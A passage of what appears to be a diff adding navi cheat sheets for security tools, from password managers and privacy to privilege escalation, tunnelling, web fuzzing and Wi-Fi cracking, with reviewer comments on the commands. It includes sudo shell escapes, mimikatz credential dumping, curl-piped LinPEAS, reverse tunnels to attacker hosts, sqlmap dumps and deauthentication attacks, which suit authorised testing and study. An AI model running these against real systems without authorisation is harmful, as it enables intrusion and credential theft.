exiftool -gpslatitude -gpslongitude <image>
# Check if email is breached
# haveibeenpwned.com API or dehashed.com
$ username: echo ""
$ domain: echo ""
$ ip: echo ""
$ nameserver: echo ""
$ company_name: echo ""
$ email: echo ""
$ api_key: echo ""
$ target: echo ""
$ image: find . -name "*.jpg" -o -name "*.png" 2>/dev/null | head -5
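Review bot: the hunter.io line takes the API key as a navi prompt and interpolates it into the command, so the secret ends up in shell history and in `ps` output; read it from the environment instead, e.g. `curl "https://api.hunter.io/v2/email-verifier?email=<email>&api_key=$HUNTER_API_KEY"` (variable name is a suggestion) and drop the `$ api_key` prompt. Also, the crt.sh query uses a bare `%.` wildcard; `%` followed by `.` is not valid percent-encoding, so URL-encode it as `%25.<domain>` to be sure the wildcard reaches the server intact.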

pass.cheat Normal file

@ -0,0 +1,134 @@
% pass, password-manager, gpg, keepass
# Initialize password store
pass init <gpg_key_id>
# Initialize with git
pass git init
# List all passwords
pass
# List passwords in folder
pass <folder>
# Show password
pass <entry>
# Show password (clipboard, 45 sec)
pass -c <entry>
# Generate new password
pass generate <entry> <length>
# Generate without symbols
pass generate -n <entry> <length>
# Generate and copy to clipboard
pass generate -c <entry> <length>
# Insert password manually
pass insert <entry>
# Insert multiline
pass insert -m <entry>
# Edit password
pass edit <entry>
# Remove password
pass rm <entry>
# Move/rename password
pass mv <old_entry> <new_entry>
# Copy password entry
pass cp <entry> <new_entry>
# Find password
pass find <search_term>
# Search in passwords
pass grep <search_term>
# Git push changes
pass git push
# Git pull changes
pass git pull
# Git status
pass git status
# Import from KeePass
pass import keepass <kdbx_file>
# Export to KeePass (manual or script)
# pass show <entry> and import to KeePass
# KeePassXC CLI - open database
keepassxc-cli open <database>
# KeePassXC CLI - list entries
keepassxc-cli ls <database>
# KeePassXC CLI - show entry
keepassxc-cli show <database> <entry>
# KeePassXC CLI - show password only
keepassxc-cli show -s <database> <entry>
# KeePassXC CLI - add entry
keepassxc-cli add <database> <entry>
# KeePassXC CLI - generate password
keepassxc-cli generate -L <length>
# KeePassXC CLI - clip password
keepassxc-cli clip <database> <entry>
# Bitwarden CLI - login
bw login
# Bitwarden CLI - unlock
bw unlock
# Bitwarden CLI - list items
bw list items
# Bitwarden CLI - get password
bw get password <item_id>
# Bitwarden CLI - create item
bw create item <json_data>
# Bitwarden CLI - sync
bw sync
# gopass (pass compatible with teams)
gopass
# gopass - init with multiple keys
gopass init <key1> <key2>
# gopass - recipient add
gopass recipients add <gpg_key_id>
# Rofi integration (pass menu)
rofi-pass
# Dmenu integration
passmenu
# Browser integration
# browserpass extension + browserpass-native
$ gpg_key_id: gpg --list-keys --keyid-format SHORT 2>/dev/null | grep -E "^pub" | awk '{print $2}' | cut -d'/' -f2
$ entry: pass 2>/dev/null | grep -v "Password Store" | sed 's/[├│└──]//g' | tr -d ' ' | grep -v '^$'
$ folder: pass 2>/dev/null | grep -v "Password Store" | grep "/" | head -5 | sed 's/[├│└──]//g' | tr -d ' '
$ length: echo "20\n32\n64"
$ old_entry: pass 2>/dev/null | grep -v "Password Store" | sed 's/[├│└──]//g' | tr -d ' ' | grep -v '^$'
$ new_entry: echo ""
$ search_term: echo ""
$ kdbx_file: find ~ -name "*.kdbx" 2>/dev/null | head -5
$ database: find ~ -name "*.kdbx" 2>/dev/null | head -5
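Review bot: the `$ entry` and `$ old_entry` suggestions strip the tree-drawing characters from `pass` output and keep only the leaf name, so an entry stored as `work/github` is offered as `github` and `pass github` then fails; they also mangle names containing spaces via `tr -d ' '`. List the store directly instead, e.g. `find "${PASSWORD_STORE_DIR:-$HOME/.password-store}" -name '*.gpg' -printf '%P\n' | sed 's/\.gpg$//'`, which yields the full relative path pass expects. Also `$ length: echo "20\n32\n64"` yields one literal line under bash; use `printf '%s\n' 20 32 64`.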

privacy.cheat Normal file

@ -0,0 +1,128 @@
% privacy, encryption, tor, gpg, pets
# Generate GPG key pair
gpg --full-generate-key
# List GPG keys
gpg --list-keys
# List secret keys
gpg --list-secret-keys
# Export public key
gpg --armor --export <key_id> > public.asc
# Export private key (backup)
gpg --armor --export-secret-keys <key_id> > private.asc
# Import a key
gpg --import <keyfile>
# Encrypt file with GPG (symmetric)
gpg -c <file>
# Encrypt file for recipient
gpg -e -r <recipient_email> <file>
# Decrypt GPG file
gpg -d <file.gpg> > <output_file>
# Sign a file
gpg --sign <file>
# Verify signature
gpg --verify <file.sig>
# Age encryption - generate key
age-keygen -o key.txt
# Age encrypt file
age -r <public_key> -o <file.age> <file>
# Age decrypt file
age -d -i key.txt -o <output> <file.age>
# Age encrypt with passphrase
age -p -o <file.age> <file>
# Start Tor service
sudo systemctl start tor
# Check Tor status
sudo systemctl status tor
# Torify a command
torify <command>
# Use torsocks
torsocks curl https://check.torproject.org
# Get new Tor circuit
sudo killall -HUP tor
# Check if using Tor
curl --socks5 localhost:9050 https://check.torproject.org/api/ip
# I2P - start router
i2prouter start
# I2P - check status
i2prouter status
# Secure delete file (shred)
shred -vfz -n 5 <file>
# Secure delete with srm
srm -vz <file>
# Wipe free space
sfill -v <mountpoint>
# BleachBit clean
bleachbit --clean system.cache system.tmp
# Veracrypt create volume
veracrypt -t -c
# Veracrypt mount volume
veracrypt <volume_file> <mount_point>
# Veracrypt dismount
veracrypt -d <mount_point>
# Check for listening services
ss -tulpn
# Block all incoming (UFW)
sudo ufw default deny incoming && sudo ufw enable
# MAC address randomization
sudo macchanger -r <interface>
# Reset MAC to permanent
sudo macchanger -p <interface>
# DNS over HTTPS test
curl -H 'accept: application/dns-json' 'https://cloudflare-dns.com/dns-query?name=example.com&type=A'
# Check DNS leaks
curl https://dnsleaktest.com/
# Metadata removal from image
exiftool -all= <image>
# Metadata removal from PDF
exiftool -all:all= <pdf>
# MAT2 metadata removal
mat2 <file>
# Check what metadata exists
exiftool <file>
$ key_id: gpg --list-keys --keyid-format SHORT 2>/dev/null | grep -E "^pub" | awk '{print $2}' | cut -d'/' -f2
$ recipient_email: echo ""
$ file: find . -type f -maxdepth 1 2>/dev/null | head -20
$ interface: ip link show | grep -E "^[0-9]" | cut -d: -f2 | tr -d ' ' | grep -v lo
$ mount_point: echo "/mnt/veracrypt"
$ public_key: echo "age1..."
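Review bot: "Get new Tor circuit" / `sudo killall -HUP tor` is a config reload, not a circuit change; a new identity is requested with `SIGNAL NEWNYM` on the control port (requires `ControlPort` plus cookie or password auth in torrc), so either change the command or reword the comment. Two further points: `$ key_id` selects 8-hex short key IDs, which are trivially collidable, so use `--keyid-format LONG` (the awk/cut pipeline works unchanged) or fingerprints; and the `shred`/`srm` entries deserve the caveat from shred's own man page that overwriting is not effective on SSDs, journaled or copy-on-write filesystems, where full-disk encryption with key destruction is the reliable option.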

privesc-linux.cheat Normal file

@ -0,0 +1,71 @@
% privesc, linux, escalation
# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Find SGID binaries
find / -perm -2000 -type f 2>/dev/null
# Check sudo permissions
sudo -l
# Find writable directories
find / -writable -type d 2>/dev/null
# Find world-writable files
find / -perm -o+w -type f 2>/dev/null
# Check cron jobs
cat /etc/crontab
ls -la /etc/cron*
crontab -l
# Find capabilities
getcap -r / 2>/dev/null
# Check for docker group
id | grep docker
# Check kernel version (for exploits)
uname -a
# Check OS version
cat /etc/os-release
# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# LinEnum
./LinEnum.sh -t
# Check passwd file writable
ls -la /etc/passwd
# Check shadow file readable
ls -la /etc/shadow
# Find password files
find / -name "*.txt" -exec grep -l "password" {} \; 2>/dev/null
# Check NFS exports (no_root_squash)
cat /etc/exports
# Find SSH keys
find / -name "id_rsa" 2>/dev/null
find / -name "authorized_keys" 2>/dev/null
# Check PATH hijacking
echo $PATH
ls -la /usr/local/bin
# GTFOBins sudo bypass - vim
sudo vim -c ':!/bin/sh'
# GTFOBins sudo bypass - find
sudo find . -exec /bin/sh \; -quit
# GTFOBins sudo bypass - awk
sudo awk 'BEGIN {system("/bin/sh")}'
# GTFOBins SUID - python
./python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
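Review bot: `curl -L ... linpeas.sh | sh` (the LinPEAS entry) executes whatever the release URL returns with no integrity check and loses the report when the pipe ends; save it first with `curl -L -o linpeas.sh ...`, compare its SHA-256 with the one published on the release page, then run `sh linpeas.sh | tee linpeas.txt`. Also: `find / -name "id_rsa"` misses modern key types, `-name "id_*"` (or adding `id_ed25519` and `id_ecdsa`) catches them; and `ls -la /etc/passwd` / `ls -la /etc/shadow` only show the mode bits, whereas `test -w /etc/passwd && echo writable` and `test -r /etc/shadow && echo readable` answer the question the comments ask, which matters when access comes through a group or an ACL rather than the listed bits.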

83
privesc-windows.cheat Normal file

@ -0,0 +1,83 @@
% privesc, windows, escalation
# System info
systeminfo
# Current user privileges
whoami /priv
# Current user groups
whoami /groups
# All users
net user
# User details
net user <username>
# Local groups
net localgroup
# Administrators group
net localgroup administrators
# Running services
wmic service list brief
# Installed patches
wmic qfe list
# Scheduled tasks
schtasks /query /fo LIST /v
# Find unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\"
# Find writable service directories
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
# AlwaysInstallElevated check
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Stored credentials
cmdkey /list
# SAM and SYSTEM backup
dir C:\Windows\Repair\SAM
dir C:\Windows\System32\config\RegBack\SAM
# PowerUp
Import-Module .\PowerUp.ps1; Invoke-AllChecks
# WinPEAS
.\winPEASany.exe
# Juicy Potato (SeImpersonate)
.\JuicyPotato.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c c:\shell.exe" -t *
# PrintSpoofer (SeImpersonate)
.\PrintSpoofer.exe -i -c cmd
# GodPotato (SeImpersonate)
.\GodPotato.exe -cmd "cmd /c whoami"
# Search for passwords in files
findstr /si password *.txt *.ini *.config
# Search registry for passwords
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
# Check saved WiFi passwords
netsh wlan show profiles
netsh wlan show profile name="<wifi_name>" key=clear
# Dump SAM with mimikatz
mimikatz.exe "privilege::debug" "lsadump::sam" "exit"
# Dump credentials with mimikatz
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
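Review bot: the unquoted-service-path one-liner is missing its last filter; as written it also lists services whose path is already quoted, so append `| findstr /i /v """` (the standard form) so only unquoted paths with spaces remain. Other points in this hunk: JuicyPotato with the listed CLSID only works up to Windows 10 1803 / Server 2016 and fails on 1809+ and Server 2019+, which is why PrintSpoofer and GodPotato are listed, say so in the comment; `lsadump::sam` needs a SYSTEM token, so from an elevated admin shell the mimikatz line should be `"privilege::debug" "token::elevate" "lsadump::sam" "exit"`; `C:\Windows\System32\config\RegBack` has been empty by default since Windows 10 1803, so an empty directory there is expected, not a negative finding; and `wmic` is deprecated and disabled by default on current Windows 11 builds, so keep a `Get-CimInstance Win32_Service` equivalent next to each wmic entry. Finally, the `(F)` + `Everyone` icacls filter misses the common `BUILTIN\Users:(M)` and `Authenticated Users` cases; filter on `(F)` or `(M)` and on both principals.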
$ username: echo ""
$ wifi_name: echo ""

127
reversing.cheat Normal file

@ -0,0 +1,127 @@
% reversing, reverse-engineering, ghidra, radare2, gdb, binary
# Ghidra - start GUI
ghidraRun
# Ghidra - analyze headless
analyzeHeadless <project_dir> <project_name> -import <binary> -postScript <script>
# radare2 - open binary
r2 <binary>
# radare2 - analyze all
r2 -A <binary>
# radare2 - analyze and open
r2 -AA <binary>
# r2 commands (inside r2):
# aaa - analyze all
# afl - list functions
# pdf - print disassembly of function
# s main - seek to main
# VV - visual graph mode
# px 100 - print hex
# iz - list strings in data section
# ii - list imports
# ie - list entry points
# radare2 - list functions
r2 -qc 'aaa; afl' <binary>
# radare2 - list strings
r2 -qc 'iz' <binary>
# radare2 - disassemble main
r2 -qc 'aaa; s main; pdf' <binary>
# GDB - start debugging
gdb <binary>
# GDB - run with args
gdb --args <binary> <arg1> <arg2>
# GDB commands:
# r - run
# b main - breakpoint at main
# b *0x401000 - breakpoint at address
# c - continue
# n - next (step over)
# s - step (step into)
# p $eax - print register
# x/10x $esp - examine memory
# info reg - show registers
# disas - disassemble current function
# bt - backtrace
# q - quit
# GDB with pwndbg/gef (enhanced)
gdb -q <binary>
# objdump - disassemble
objdump -d <binary>
# objdump - all headers
objdump -x <binary>
# objdump - disassemble with source
objdump -S <binary>
# readelf - file header
readelf -h <binary>
# readelf - sections
readelf -S <binary>
# readelf - symbols
readelf -s <binary>
# readelf - program headers
readelf -l <binary>
# nm - list symbols
nm <binary>
# nm - dynamic symbols
nm -D <binary>
# strings - extract strings
strings <binary>
strings -n 10 <binary>
# file - identify binary type
file <binary>
# ldd - list shared libraries
ldd <binary>
# strace - trace syscalls
strace <binary>
strace -f <binary>
# ltrace - trace library calls
ltrace <binary>
# Cutter - r2 GUI
cutter <binary>
# Binary Ninja (commercial)
binaryninja <binary>
# IDA Free
ida64 <binary>
# checksec - binary protections
checksec --file=<binary>
# ROPgadget - find gadgets
ROPgadget --binary <binary>
# pwntools (Python)
# from pwn import *
# elf = ELF('<binary>')
$ binary: find . -type f -executable 2>/dev/null | head -10
$ project_dir: echo "/tmp/ghidra_projects"
$ project_name: echo "analysis"
$ script: echo ""
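Review bot: the headless Ghidra entry cannot run with its defaults: `$ script: echo ""` leaves `-postScript` with no argument, which analyzeHeadless rejects, so either default the variable to a real script name or drop `-postScript <script>` from this entry and make it a separate line. Also the comments on `r2 -A` and `r2 -AA` do not describe the difference: both open the binary; `-A` runs `aaa` and `-AA` runs the deeper `aaaa`, so label them "analyze (aaa)" and "deep analysis (aaaa)". Minor: the GDB register examples use `$eax`/`$esp`, which are 32-bit; add `$rax`/`$rsp` since most targets today are x86-64, and note next to the strace/ltrace/gdb entries that they execute the sample, so unknown binaries belong in an isolated VM.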

129
secure-comms.cheat Normal file

@ -0,0 +1,129 @@
% comms, signal, matrix, encrypted, messaging
# Signal CLI - register
signal-cli -u <phone_number> register
# Signal CLI - verify
signal-cli -u <phone_number> verify <code>
# Signal CLI - send message
signal-cli -u <phone_number> send -m "<message>" <recipient>
# Signal CLI - send to group
signal-cli -u <phone_number> send -m "<message>" -g <group_id>
# Signal CLI - receive messages
signal-cli -u <phone_number> receive
# Signal CLI - list groups
signal-cli -u <phone_number> listGroups
# Signal CLI - create group
signal-cli -u <phone_number> createGroup -n "<group_name>" -m <member1> <member2>
# Signal CLI - daemon mode
signal-cli -u <phone_number> daemon
# Matrix - login with element-cli
element-cli login <homeserver> <username> <password>
# Matrix - send message (Python SDK)
# pip install matrix-nio
# See nio documentation
# Matrix CLI - gomuks (TUI client)
gomuks
# Matrix CLI - matrixcli
matrixcli -s <homeserver> -u <username> send <room_id> "<message>"
# SimpleX Chat - start
simplex-chat
# Briar - desktop
briar-desktop
# Session messenger
session-desktop
# Keybase - login
keybase login
# Keybase - send message
keybase chat send <username> "<message>"
# Keybase - encrypt file
keybase encrypt <username> -i <input_file> -o <output_file>
# Keybase - decrypt file
keybase decrypt -i <input_file> -o <output_file>
# Keybase - sign file
keybase sign -i <input_file> -o <output_file.sig>
# Keybase - verify signature
keybase verify -i <file.sig>
# GPG - encrypt for recipient
gpg -e -r <recipient> <file>
# GPG - sign and encrypt
gpg -se -r <recipient> <file>
# GPG - decrypt
gpg -d <file.gpg>
# age - encrypt for recipient
age -r <public_key> -o <output.age> <input_file>
# age - encrypt with passphrase
age -p -o <output.age> <input_file>
# age - decrypt
age -d -i <key_file> -o <output> <input.age>
# OnionShare - share files over Tor
onionshare-cli <file>
# OnionShare - receive files
onionshare-cli --receive
# OnionShare - chat
onionshare-cli --chat
# Magic Wormhole - send file
wormhole send <file>
# Magic Wormhole - receive
wormhole receive <code>
# Croc - send file
croc send <file>
# Croc - receive
croc <code>
# XMPP with profanity
profanity
# IRC with weechat (+ OTR)
weechat
# Ricochet Refresh (Tor messenger)
ricochet-refresh
$ phone_number: echo "+1234567890"
$ recipient: echo "+1234567890"
$ code: echo ""
$ message: echo ""
$ group_id: echo ""
$ group_name: echo ""
$ homeserver: echo "https://matrix.org"
$ username: echo ""
$ password: echo ""
$ room_id: echo ""
$ public_key: echo "age1..."
$ key_file: echo "key.txt"
$ input_file: find . -type f 2>/dev/null | head -10
$ output_file: echo "encrypted"
$ file: find . -type f 2>/dev/null | head -10
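Review bot: `element-cli login <homeserver> <username> <password>` takes the password as a command-line argument, so it lands in shell history and in `ps` output for every user on the host; the same applies to anything else that fills `$ password:`. Prefer a client that prompts, or reads the secret from a file or environment variable. Also `signal-cli ... register` usually needs a `--captcha <token>` argument now (the server refuses registration without one in most cases), worth a comment so the first run does not look broken; and the `$ recipient` default is the same number as `$ phone_number`, so the send entry defaults to messaging yourself.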

129
solidity.cheat Normal file

@ -0,0 +1,129 @@
% solidity, audit, smartcontract, ethereum, foundry
# Foundry - create new project
forge init <project_name>
# Foundry - build/compile
forge build
# Foundry - run tests
forge test
# Foundry - run tests verbose
forge test -vvvv
# Foundry - run specific test
forge test --match-test <test_name>
# Foundry - gas report
forge test --gas-report
# Foundry - coverage
forge coverage
# Foundry - deploy contract
forge create <contract> --rpc-url <rpc_url> --private-key <private_key>
# Foundry - verify contract
forge verify-contract <address> <contract> --chain <chain_id>
# Cast - call read function
cast call <contract_address> "<function_sig>" --rpc-url <rpc_url>
# Cast - send transaction
cast send <contract_address> "<function_sig>" --rpc-url <rpc_url> --private-key <private_key>
# Cast - decode calldata
cast calldata-decode "<function_sig>" <calldata>
# Cast - get storage slot
cast storage <contract_address> <slot> --rpc-url <rpc_url>
# Cast - keccak256 hash
cast keccak "<text>"
# Cast - convert to wei
cast to-wei <amount> ether
# Cast - convert from wei
cast from-wei <amount>
# Slither - full analysis
slither <contract_or_dir>
# Slither - specific detectors
slither <contract> --detect <detector>
# Slither - print contract summary
slither <contract> --print contract-summary
# Slither - print function summary
slither <contract> --print function-summary
# Slither - print inheritance
slither <contract> --print inheritance-graph
# Slither - human summary
slither <contract> --print human-summary
# Slither - list detectors
slither --list-detectors
# Mythril - analyze contract
myth analyze <contract.sol>
# Mythril - analyze deployed contract
myth analyze --address <contract_address> --rpc <rpc_url>
# Mythril - execution timeout
myth analyze <contract.sol> --execution-timeout 300
# Echidna - fuzz testing
echidna <contract.sol> --contract <contract_name>
# Echidna - with config
echidna <contract.sol> --contract <contract_name> --config echidna.yaml
# Aderyn - static analysis (Rust-based, fast)
aderyn <contract_or_dir>
# Solhint - linter
solhint <contract.sol>
# Solhint - init config
solhint --init
# Common vulnerability patterns to check:
# - Reentrancy (external calls before state changes)
# - Integer overflow/underflow (pre-0.8.0)
# - Unchecked return values
# - Access control issues
# - Front-running susceptibility
# - Oracle manipulation
# - Flash loan attacks
# - Delegate call to untrusted contract
# Check for selfdestruct
grep -rn "selfdestruct\|suicide" <dir>
# Check for delegatecall
grep -rn "delegatecall" <dir>
# Check for tx.origin
grep -rn "tx.origin" <dir>
# Check for inline assembly
grep -rn "assembly" <dir>
$ project_name: echo "my_project"
$ contract: find . -name "*.sol" 2>/dev/null | head -10
$ contract_or_dir: echo "."
$ contract_address: echo "0x..."
$ rpc_url: echo "https://eth-mainnet.g.alchemy.com/v2/YOUR_KEY"
$ private_key: echo ""
$ function_sig: echo "balanceOf(address)"
$ test_name: echo "test"
$ detector: echo "reentrancy-eth\nreentrancy-no-eth\narbitrary-send\nsuicide\nuninitialized-storage"
$ chain_id: echo "1\n5\n137\n42161" --- --header "1=mainnet, 5=goerli, 137=polygon, 42161=arbitrum"
$ slot: echo "0"
$ dir: echo "src/"
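Review bot: `forge create ... --private-key <private_key>` and `cast send ... --private-key <private_key>` put the key in shell history and `ps`; with `$ private_key: echo ""` navi will also prompt for it in plain text. Use `--keystore`/`--account` (an encrypted keystore) or `--private-key "$PRIVATE_KEY"` from the environment instead, and note that recent Foundry releases require `--broadcast` on `forge create` before it actually deploys. Also the `$ chain_id` list still offers `5=goerli`, which has been shut down; replace it with Sepolia (`11155111`). Lastly, `echo "1\n5\n137\n42161"` only expands `\n` under dash-style echo; if navi runs suggestions through bash the list collapses to one literal option, so use `printf '%s\n' 1 11155111 137 42161` (same for the `$ detector` list).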

117
steganography.cheat Normal file

@ -0,0 +1,117 @@
% steganography, stego, hidden, ctf
# steghide - extract hidden data
steghide extract -sf <image>
# steghide - extract with password
steghide extract -sf <image> -p <password>
# steghide - embed data
steghide embed -cf <cover_image> -ef <secret_file>
# steghide - info about file
steghide info <image>
# stegseek - crack steghide password
stegseek <image> <wordlist>
# stegseek - without wordlist (rockyou default)
stegseek <image>
# zsteg - PNG/BMP analysis
zsteg <image>
# zsteg - all checks
zsteg -a <image>
# binwalk - scan for embedded files
binwalk <file>
# binwalk - extract embedded files
binwalk -e <file>
# binwalk - extract with matryoshka
binwalk -eM <file>
# foremost - file carving
foremost -i <file> -o <output_dir>
# exiftool - view all metadata
exiftool <file>
# exiftool - view specific tag
exiftool -Comment <file>
# strings - find hidden text
strings <file>
strings -n 10 <file>
# xxd - hex dump
xxd <file> | head -50
# Check file magic bytes
xxd -l 16 <file>
file <file>
# pngcheck - PNG structure
pngcheck -v <image>
# stegoveritas - multiple stego checks
stegoveritas <image>
# openstego - extract (GUI tool)
openstego extract -sf <image> -xd <output_dir>
# outguess - extract
outguess -r <image> <output_file>
# jsteg - JPEG steganography
jsteg reveal <image>
# Audio steganography - Audacity
# Open in Audacity, check spectrogram view
# Audio steganography - sonic-visualiser
sonic-visualiser <audio_file>
# LSB extraction with Python
# from PIL import Image
# img = Image.open('image.png')
# Extract least significant bits
# Check for appended data
# Compare file size to expected size
# Look for data after EOF marker
# SNOW - whitespace steganography
snow -C <text_file>
# stegsnow - extract from whitespace
stegsnow -C <text_file>
# PDF steganography - check streams
pdf-parser <pdf_file>
pdftotext <pdf_file>
# QR code extraction
zbarimg <image>
# Common CTF stego workflow:
# 1. file / xxd - identify type
# 2. exiftool - check metadata
# 3. strings - hidden text
# 4. binwalk - embedded files
# 5. steghide/stegseek - hidden data
# 6. zsteg - LSB for PNG
$ image: find . -name "*.jpg" -o -name "*.png" -o -name "*.bmp" 2>/dev/null | head -10
$ file: find . -type f 2>/dev/null | head -10
$ cover_image: find . -name "*.jpg" 2>/dev/null | head -5
$ secret_file: echo "secret.txt"
$ password: echo ""
$ wordlist: echo "/usr/share/wordlists/rockyou.txt"
$ output_dir: echo "extracted"
$ output_file: echo "output.txt"
$ text_file: find . -name "*.txt" 2>/dev/null | head -5
$ audio_file: find . -name "*.wav" -o -name "*.mp3" 2>/dev/null | head -5
$ pdf_file: find . -name "*.pdf" 2>/dev/null | head -5
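Review bot: the whitespace steganography entries (`snow -C` and `stegsnow -C`) are the same tool (`stegsnow` is just the Debian package name), and `-C` means "uncompress", which is only right when the data was hidden with compression; extraction in general is `stegsnow -p <password> <text_file>` (add `-C` if it was compressed), so fold the two into one entry with the `-p` option. Also `openstego extract -sf <image> -xd <output_dir>` is a CLI invocation, not the GUI the comment mentions, and the "LSB extraction with Python" item is a comment stub with no runnable line; either drop it or point at the `zsteg` entry above, which already does LSB extraction for PNG/BMP.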

114
tunnels.cheat Normal file

@ -0,0 +1,114 @@
% tunnels, ssh, pivoting, portforward, proxy
# SSH local port forward
ssh -L <local_port>:<target_host>:<target_port> <user>@<jump_host>
# SSH remote port forward
ssh -R <remote_port>:<local_host>:<local_port> <user>@<remote_host>
# SSH dynamic SOCKS proxy
ssh -D <socks_port> <user>@<host>
# SSH with ProxyJump (bastion)
ssh -J <user>@<jump_host> <user>@<target_host>
# SSH tunnel background
ssh -fN -L <local_port>:<target_host>:<target_port> <user>@<jump_host>
# SSH reverse tunnel (callback)
ssh -fN -R <remote_port>:localhost:22 <user>@<attacker_host>
# Chisel server (on attacker)
chisel server -p <port> --reverse
# Chisel client reverse SOCKS
chisel client <attacker_ip>:<port> R:socks
# Chisel client port forward
chisel client <attacker_ip>:<port> R:<remote_port>:<target_host>:<target_port>
# Chisel client local forward
chisel client <server_ip>:<port> <local_port>:<target_host>:<target_port>
# Ligolo-ng proxy (attacker)
./proxy -selfcert
# Ligolo-ng agent (victim)
./agent -connect <attacker_ip>:11601 -ignore-cert
# Socat port forward
socat TCP-LISTEN:<local_port>,fork TCP:<target_host>:<target_port>
# Socat file transfer
# Receiver:
socat TCP-LISTEN:<port>,fork file:<output_file>,create
# Sender:
socat TCP:<target>:<port> file:<input_file>
# Netcat relay
nc -lvp <port1> | nc <target> <port2>
# Proxychains with nmap
proxychains nmap -sT -Pn <target>
# Proxychains any command
proxychains <command>
# Edit proxychains config
# /etc/proxychains4.conf
# socks5 127.0.0.1 1080
# WireGuard - generate keys
wg genkey | tee privatekey | wg pubkey > publickey
# WireGuard - quick up
wg-quick up <interface>
# WireGuard - quick down
wg-quick down <interface>
# WireGuard - show status
wg show
# sshuttle - VPN over SSH
sshuttle -r <user>@<host> <network_cidr>
# sshuttle - all traffic
sshuttle -r <user>@<host> 0/0
# Metasploit portfwd
# portfwd add -l <local> -p <remote_port> -r <target>
# Meterpreter autoroute
# run autoroute -s <subnet>
# plink (Windows SSH)
plink.exe -L <local_port>:<target>:<target_port> <user>@<host>
# netsh port forward (Windows)
netsh interface portproxy add v4tov4 listenport=<local_port> listenaddress=0.0.0.0 connectport=<target_port> connectaddress=<target_host>
# netsh show forwards
netsh interface portproxy show all
# netsh delete forward
netsh interface portproxy delete v4tov4 listenport=<local_port> listenaddress=0.0.0.0
$ local_port: echo "8080"
$ target_host: echo ""
$ target_port: echo "80"
$ user: echo ""
$ jump_host: echo ""
$ remote_host: echo ""
$ remote_port: echo "9999"
$ local_host: echo "127.0.0.1"
$ socks_port: echo "1080"
$ host: echo ""
$ attacker_ip: echo ""
$ attacker_host: echo ""
$ port: echo "8080"
$ server_ip: echo ""
$ network_cidr: echo "10.0.0.0/24"
$ interface: echo "wg0"
$ output_file: echo "received_file"
$ input_file: find . -type f 2>/dev/null | head -5
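Review bot: `nc -lvp <port1> | nc <target> <port2>` is one-way; replies from the target never reach the first client, so it does not work as a relay for anything interactive. Use a named pipe for the return path, `mkfifo /tmp/f; nc -lvp <port1> < /tmp/f | nc <target> <port2> > /tmp/f`, or just the `socat TCP-LISTEN:...,fork TCP:...` entry already above it. Also `wg genkey | tee privatekey | wg pubkey > publickey` writes the private key with the default umask (usually world-readable); prefix it with `umask 077` as the WireGuard quick start does. And the proxychains nmap line should add `-n` so hostname lookups do not go out unproxied.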

59
web.cheat Normal file

@ -0,0 +1,59 @@
% web, webapp, burp, fuzzing
# Directory fuzzing with ffuf
ffuf -u http://<target>/FUZZ -w <wordlist>
# Directory fuzzing with extensions
ffuf -u http://<target>/FUZZ -w <wordlist> -e .php,.html,.txt,.bak
# Subdomain fuzzing
ffuf -u http://FUZZ.<domain> -w <wordlist> -H "Host: FUZZ.<domain>"
# POST parameter fuzzing
ffuf -u http://<target>/login -X POST -d "username=admin&password=FUZZ" -w <wordlist>
# Filter by status code
ffuf -u http://<target>/FUZZ -w <wordlist> -fc 404
# Filter by response size
ffuf -u http://<target>/FUZZ -w <wordlist> -fs 0
# Gobuster directory scan
gobuster dir -u http://<target> -w <wordlist>
# Gobuster with extensions
gobuster dir -u http://<target> -w <wordlist> -x php,html,txt
# Nikto scan
nikto -h http://<target>
# WhatWeb (technology detection)
whatweb http://<target>
# SQLMap basic
sqlmap -u "http://<target>/page.php?id=1" --batch
# SQLMap dump database
sqlmap -u "http://<target>/page.php?id=1" --dbs --batch
# SQLMap dump tables
sqlmap -u "http://<target>/page.php?id=1" -D <database> --tables --batch
# XSS test payload
<script>alert('XSS')</script>
# Curl with POST data
curl -X POST http://<target>/login -d "username=admin&password=test" -v
# Curl with cookies
curl http://<target> -b "session=<cookie>"
# Curl with headers
curl http://<target> -H "Authorization: Bearer <token>"
$ target: echo ""
$ domain: echo ""
$ wordlist: echo "/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt"
$ database: echo ""
$ cookie: echo ""
$ token: echo ""
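Review bot: the XSS payload line `<script>alert('XSS')</script>` will not survive navi's parser: `<script>` is the placeholder syntax, so selecting that entry prompts for a variable named `script` and never prints the payload; escape it or move it into the comment. Also the comment on `sqlmap ... --dbs` says "dump database" but `--dbs` only enumerates database names, dumping is `-D <database> -T <table> --dump`; and the subdomain entry mixes two techniques: FUZZ in the hostname does DNS-based enumeration (the `Host:` header is then redundant), whereas virtual-host fuzzing keeps `-u http://<target>` fixed and varies only `-H "Host: FUZZ.<domain>"`, usually with `-fs` set to the default response size.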

89
wireless.cheat Normal file

@ -0,0 +1,89 @@
% wireless, wifi, aircrack, wpa, hacking
# Check wireless interfaces
iwconfig
# Kill interfering processes
sudo airmon-ng check kill
# Start monitor mode
sudo airmon-ng start <interface>
# Stop monitor mode
sudo airmon-ng stop <monitor_interface>
# Scan for networks
sudo airodump-ng <monitor_interface>
# Target specific network (capture handshake)
sudo airodump-ng -c <channel> --bssid <bssid> -w <output_prefix> <monitor_interface>
# Deauth attack (force handshake)
sudo aireplay-ng -0 <count> -a <bssid> -c <client_mac> <monitor_interface>
# Deauth broadcast (all clients)
sudo aireplay-ng -0 <count> -a <bssid> <monitor_interface>
# Crack WPA/WPA2 handshake
aircrack-ng -w <wordlist> -b <bssid> <capture_file>
# Crack with hashcat (faster - convert first)
cap2hccapx <capture_file> output.hccapx
hashcat -m 22000 output.hccapx <wordlist>
# PMKID attack (no handshake needed)
sudo hcxdumptool -i <monitor_interface> -o pmkid.pcapng --enable_status=1
# Convert PMKID for hashcat
